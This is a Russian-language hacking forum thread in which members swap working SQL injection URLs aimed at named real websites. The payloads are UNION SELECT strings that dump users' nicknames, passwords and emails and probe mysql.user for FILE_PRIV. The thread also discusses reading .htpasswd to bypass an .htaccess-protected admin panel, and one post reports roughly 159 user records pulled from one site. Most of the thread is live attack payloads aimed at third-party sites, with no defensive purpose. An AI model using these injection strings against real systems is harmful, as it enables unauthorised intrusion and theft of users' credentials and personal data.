boberko http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2,3,group_concat(nick,char(58),password),5,6,7+from+users+--+ хотя не думаю что это таблица админов
Konqi это таблица простых пользователей, я заходил все пашет...для админов не подходит( в бд этих данных точно нету, все пересмотрел не нашел... возможно ли как то зайти на исходник файла и узнать логин и пароль? или никак?
какой нахрен смех? я тебе немекнул насчет бейсик авторизации...хоть погуглил бы перед тем как опять херню всякую постить...мде... знания участников форума с каждым днем стремительно уменьшаются... где тот грей или джокестер, которые за такие вопросы из новичка делали чайника и ламера
Что куда у тебя не подходит? все там норм просто админка под хтаццессом ( обойти его способ есть, но надо права на запись... а если они есть париться с хтацессом помойму извращение. имхо: вопрос в разряд тупые ))) Горев реально прав, ребята давайте чуток читать )
но если есть file_priv и знаешь путь к сайту то можно читать .htpasswd, а там лежат пароли(хеши(AFAIK md5(unix))) к .htaccess
представим что ты прав, "инклудим" .htpasswd, но это на сколько я знаю не script,a файл содержащий login:hash и по твоему этот файл должен исполнятся? я конечно этому не верю что file_priv инклудит, но если даже это было бы так, то в нашем случай инклуд=читалка, так как в файле нету кода. но как мы знаем я всегда не прав,так что простите за дезинформацию. ну а если серьезно то лучше бы ты этого не сказал.
File_priv распространяется только на чтение файлов и на их запись, ни о каком инклудинге речи идти не может.
file_priv - доступ к файлам на сервере! вперед читать мануалы, ыыы цитирую: Konqi: Я думаю ты меня не понял, этот вариант возможен, но не рационален... ты же штаны через голову не одеваешь? Извини за грубое сравнение ) ты наверное один стараешься здесь все поддержать )
http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2,3,FILE_PRIV,5,6,7+from+mysql.user+--+ где вы здесь увидели file_priv Y? В упор не вижу....
да нет там нихрена...хз что развели демагогию...никаких прав у юзверя в данном случае нет..и говорить о том как можно было бы сделать , если бы были эти права..я считаю нонсенсом....
почему не показать номер? http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+ http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
потому что чуркой быть, это судьба... вы хоть читать умеете? или с пастбища научились в интернет выходить, ковычку подставили и все..ХАЦКЕР мега кул....модеры потрите мой пост если я не прав...предлагаю ввести правило что бы таких юзверей по повторному вопросу по стандартной скуле отсылать как минимум на день в бан... и ссылку на мануал по скулям датЬ...будет и время и источник ..
Чтение файлов нету, максимум что можно от сюда достать так это юзеров (159) http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2,3,concat_ws(char(58),nick,password,email),5,6,7+from+users--
